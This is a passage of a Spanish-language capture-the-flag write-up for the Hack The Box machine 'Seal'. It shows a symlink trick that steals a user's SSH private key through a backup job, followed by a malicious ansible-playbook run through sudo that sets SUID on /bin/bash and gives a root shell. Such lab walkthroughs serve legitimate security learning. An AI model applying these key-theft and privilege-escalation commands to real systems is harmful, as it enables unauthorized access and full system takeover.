                                % <span class="o">(</span>to_text<span class="o">(</span>b_ansible_dir, <span class="nv">errors</span><span class="o">=</span><span class="s1">'surrogate_or_replace'</span><span class="o">)</span>,
                                   to_text<span class="o">(</span>exc, <span class="nv">errors</span><span class="o">=</span><span class="s1">'surrogate_or_replace'</span><span class="o">)))</span>
        <span class="k">else</span>:
            display.debug<span class="o">(</span><span class="s2">"Created the '%s' directory"</span> % to_text<span class="o">(</span>b_ansible_dir, <span class="nv">errors</span><span class="o">=</span><span class="s1">'surrogate_or_replace'</span><span class="o">))</span>

        try:
            args <span class="o">=</span> <span class="o">[</span>to_text<span class="o">(</span>a, <span class="nv">errors</span><span class="o">=</span><span class="s1">'surrogate_or_strict'</span><span class="o">)</span> <span class="k">for </span>a <span class="k">in </span>sys.argv]
        except UnicodeError:
            display.error<span class="o">(</span><span class="s1">'Command line args are not in utf-8, unable to continue.  Ansible currently only understands utf-8'</span><span class="o">)</span>
            display.display<span class="o">(</span>u<span class="s2">"The full traceback was:</span><span class="se">\n\n</span><span class="s2">%s"</span> % to_text<span class="o">(</span>traceback.format_exc<span class="o">()))</span>
            exit_code <span class="o">=</span> 6
        <span class="k">else</span>:
            cli <span class="o">=</span> mycli<span class="o">(</span>args<span class="o">)</span>
            exit_code <span class="o">=</span> cli.run<span class="o">()</span>

    except AnsibleOptionsError as e:
        cli.parser.print_help<span class="o">()</span>
        display.error<span class="o">(</span>to_text<span class="o">(</span>e<span class="o">)</span>, <span class="nv">wrap_text</span><span class="o">=</span>False<span class="o">)</span>
        exit_code <span class="o">=</span> 5
    except AnsibleParserError as e:
        display.error<span class="o">(</span>to_text<span class="o">(</span>e<span class="o">)</span>, <span class="nv">wrap_text</span><span class="o">=</span>False<span class="o">)</span>
        exit_code <span class="o">=</span> 4
<span class="c"># TQM takes care of these, but leaving comment to reserve the exit codes</span>
<span class="c">#    except AnsibleHostUnreachable as e:</span>
<span class="c">#        display.error(str(e))</span>
<span class="c">#        exit_code = 3</span>
<span class="c">#    except AnsibleHostFailed as e:</span>
<span class="c">#        display.error(str(e))</span>
<span class="c">#        exit_code = 2</span>
    except AnsibleError as e:
        display.error<span class="o">(</span>to_text<span class="o">(</span>e<span class="o">)</span>, <span class="nv">wrap_text</span><span class="o">=</span>False<span class="o">)</span>
        exit_code <span class="o">=</span> 1
    except KeyboardInterrupt:
        display.error<span class="o">(</span><span class="s2">"User interrupted execution"</span><span class="o">)</span>
        exit_code <span class="o">=</span> 99
    except Exception as e:
        <span class="k">if </span>C.DEFAULT_DEBUG:
            <span class="c"># Show raw stacktraces in debug mode, It also allow pdb to</span>
            <span class="c"># enter post mortem mode.</span>
            raise
        have_cli_options <span class="o">=</span> bool<span class="o">(</span>context.CLIARGS<span class="o">)</span>
        display.error<span class="o">(</span><span class="s2">"Unexpected Exception, this is probably a bug: %s"</span> % to_text<span class="o">(</span>e<span class="o">)</span>, <span class="nv">wrap_text</span><span class="o">=</span>False<span class="o">)</span>
        <span class="k">if </span>not have_cli_options or have_cli_options and context.CLIARGS[<span class="s1">'verbosity'</span><span class="o">]</span> <span class="o">&gt;</span> 2:
            log_only <span class="o">=</span> False
            <span class="k">if </span>hasattr<span class="o">(</span>e, <span class="s1">'orig_exc'</span><span class="o">)</span>:
                display.vvv<span class="o">(</span><span class="s1">'\nexception type: %s'</span> % to_text<span class="o">(</span><span class="nb">type</span><span class="o">(</span>e.orig_exc<span class="o">)))</span>
                why <span class="o">=</span> to_text<span class="o">(</span>e.orig_exc<span class="o">)</span>
                <span class="k">if </span>to_text<span class="o">(</span>e<span class="o">)</span> <span class="o">!=</span> why:
                    display.vvv<span class="o">(</span><span class="s1">'\noriginal msg: %s'</span> % why<span class="o">)</span>
        <span class="k">else</span>:
            display.display<span class="o">(</span><span class="s2">"to see the full traceback, use -vvv"</span><span class="o">)</span>
            log_only <span class="o">=</span> True
        display.display<span class="o">(</span>u<span class="s2">"the full traceback was:</span><span class="se">\n\n</span><span class="s2">%s"</span> % to_text<span class="o">(</span>traceback.format_exc<span class="o">())</span>, <span class="nv">log_only</span><span class="o">=</span>log_only<span class="o">)</span>
        exit_code <span class="o">=</span> 250

    sys.exit<span class="o">(</span>exit_code<span class="o">)</span>
</code></pre></div></div>
<p>Analizando el codigo vemos que que tira de uan wildcard a la hora de ejecutarse y del user luis. De que archivos esta haciendo el backup?? que permisos tienen esos archivos?
Solucion, encontramos que la carpeta <code class="language-plaintext highlighter-rouge">UPLOADS</code> se puede modificar por nosotros(otros) y asi podriamos hacer que el directorio tenga un enlace simbolico al directorio <code class="language-plaintext highlighter-rouge">.ssh</code> del user <code class="language-plaintext highlighter-rouge">Luis</code> y si tenemos suerte y encontramos una id_rsa, en el directorio <code class="language-plaintext highlighter-rouge">Uploads</code> en el siguiente backup probaremos a conectarnos por SSH.</p>

<p>Nos movemos a donde estan los recursos que se comprimen en el <code class="language-plaintext highlighter-rouge">backup</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard<span class="nv">$ </span><span class="nb">pwd</span>
/var/lib/tomcat9/webapps/ROOT/admin/dashboard

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 92
drwxr-xr-x 5 root root  4096 Mar  7  2015 bootstrap
drwxr-xr-x 2 root root  4096 Mar  7  2015 css
drwxr-xr-x 4 root root  4096 Mar  7  2015 images
<span class="nt">-rw-r--r--</span> 1 root root 71744 May  6  2021 index.html
drwxr-xr-x 4 root root  4096 Mar  7  2015 scripts
drwxrwxrwx 2 root root  4096 May  7  2021 uploads
</code></pre></div></div>
<p>Procedemos con el <code class="language-plaintext highlighter-rouge">enlace simbolico</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-s</span> /home/luis/.ssh/ uploads/
</code></pre></div></div>
<p>Ahora procedemos a descomprimir el siguiente backup y en el directorio uploads encontraremos <code class="language-plaintext highlighter-rouge">.ssh</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># pwd                      </span>
/HTB/Intentando/Seal/content/dashboard/uploads

<span class="c"># ls -la                       </span>
total 12
drwx------ 3 root root 4096 nov 13 15:45 <span class="nb">.</span>
drwx------ 3 root root 4096 nov 13 21:26 ..
drwx------ 2 root root 4096 nov 13 15:45 .ssh

<span class="c"># ls -l .ssh      </span>
total 12
<span class="nt">-rw-r--r--</span> 1 root root  563 nov 13 15:45 authorized_keys
<span class="nt">-rw-------</span> 1 root root 2590 nov 13 15:45 id_rsa
<span class="nt">-rw-r--r--</span> 1 root root  563 nov 13 15:45 id_rsa.pub
</code></pre></div></div>

<p>Procedemos a darle permisos 600 al <code class="language-plaintext highlighter-rouge">id_rsa</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ssh -i id_rsa luis@10.10.10.250</span>
Welcome to Ubuntu 20.04.2 LTS <span class="o">(</span>GNU/Linux 5.4.0-80-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage

  System information as of Sun 14 Nov 2021 11:27:14 AM UTC

  System load:  0.0               Processes:             171
  Usage of /:   47.1% of 9.58GB   Users logged <span class="k">in</span>:       0
  Memory usage: 28%               IPv4 address <span class="k">for </span>eth0: 10.10.10.250
  Swap usage:   0%

 <span class="k">*</span> Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!

     https://microk8s.io/

22 updates can be applied immediately.
15 of these updates are standard security updates.
To see these additional updates run: apt list <span class="nt">--upgradable</span>


The list of available updates is more than a week old.
To check <span class="k">for </span>new updates run: <span class="nb">sudo </span>apt update

Last login: Fri May  7 07:00:18 2021 from 10.10.14.2
luis@seal:~<span class="nv">$ </span>
</code></pre></div></div>

<p>Y nos conectamos por <code class="language-plaintext highlighter-rouge">SSH</code> como el user Luis</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luis@seal:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>luis on seal:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User luis may run the following commands on seal:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/bin/ansible-playbook <span class="k">*</span>
</code></pre></div></div>

<h1 id="privesc-to-root">Privesc to Root</h1>
<p>Procedemos a crearnos un archivo <code class="language-plaintext highlighter-rouge">.yml malicioso</code> que cuando ejecutemos el <code class="language-plaintext highlighter-rouge">/usr/bin/ansible-playbook nos injeccte un comando malicioso</code> como el user ROOT</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luis@seal:/dev/shm<span class="nv">$ </span><span class="nb">cat </span>setenso.yml 
  - name: Check the remote host <span class="nb">uptime
    </span>hosts: localhost
    tasks:
      - name: Execute the Uptime <span class="nb">command </span>over Command module
        <span class="nb">command</span>: <span class="s2">"chmod +s /bin/bash"</span>
</code></pre></div></div>
<p>Y procedemos a ejecutarlo</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luis@seal:/dev/shm<span class="nv">$ </span>nano setenso.yml                                                                                                                                                                                
luis@seal:/dev/shm<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-u</span> root /usr/bin/ansible-playbook setenso.yml 
<span class="o">[</span>WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match <span class="s1">'all'</span>                                                                                         
                                                                                                                                                                                                                    
PLAY <span class="o">[</span>Check the remote host <span class="nb">uptime</span><span class="o">]</span> <span class="k">********************************************************************************************************************************************************************************</span>
                                                                                                                                                                                                                    
TASK <span class="o">[</span>Gathering Facts] <span class="k">*********************************************************************************************************************************************************************************************</span>
ok: <span class="o">[</span>localhost]                                                                                                                                                                                                     
                                                                                                                                                                                                                    
TASK <span class="o">[</span>Execute the Uptime <span class="nb">command </span>over Command module] <span class="k">**************************************************************************************************************************************************************</span>
<span class="o">[</span>WARNING]: Consider using the file module with mode rather than running <span class="s1">'chmod'</span><span class="nb">.</span>  If you need to use <span class="nb">command </span>because file is insufficient you can add <span class="s1">'warn: false'</span> to this <span class="nb">command </span>task or <span class="nb">set</span>                     
<span class="s1">'command_warnings=False'</span> <span class="k">in </span>ansible.cfg to get rid of this message.
changed: <span class="o">[</span>localhost]

PLAY RECAP <span class="k">*********************************************************************************************************************************************************************************************************</span>
localhost                  : <span class="nv">ok</span><span class="o">=</span>2    <span class="nv">changed</span><span class="o">=</span>1    <span class="nv">unreachable</span><span class="o">=</span>0    <span class="nv">failed</span><span class="o">=</span>0    <span class="nv">skipped</span><span class="o">=</span>0    <span class="nv">rescued</span><span class="o">=</span>0    <span class="nv">ignored</span><span class="o">=</span>0   
</code></pre></div></div>

<p>Comprobamos que nos a injectado el comando</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luis@seal:/dev/shm<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /bin/bash
<span class="nt">-rwsr-sr-x</span> 1 root root 1183448 Jun 18  2020 /bin/bash
</code></pre></div></div>

<p>Procedemos a spawnearnos una shell con el comando <code class="language-plaintext highlighter-rouge">bash -p</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luis@seal:/dev/shm<span class="nv">$ </span>bash <span class="nt">-p</span>
bash-5.0# <span class="nb">whoami
</span>root
bash-5.0# <span class="nb">cat</span> /root/root.txt 
0a7a7226295a7axxxxxxxxxxxxxxxxxxxxxx
</code></pre></div></div>

<p>Maquina Rooteada =D 	K0 H4ck</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/11/14/Seal.html';
     this.page.identifier = '/2021/11/14/Seal';
     this.page.title = 'Maquina Retirada Seal de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SEAL';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
